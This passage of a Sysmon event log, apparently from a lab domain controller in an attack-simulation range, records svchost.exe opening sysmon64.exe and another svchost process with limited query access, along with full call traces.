08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6380,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6381,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6382,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6383,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6384,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6385,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6386,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6387,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 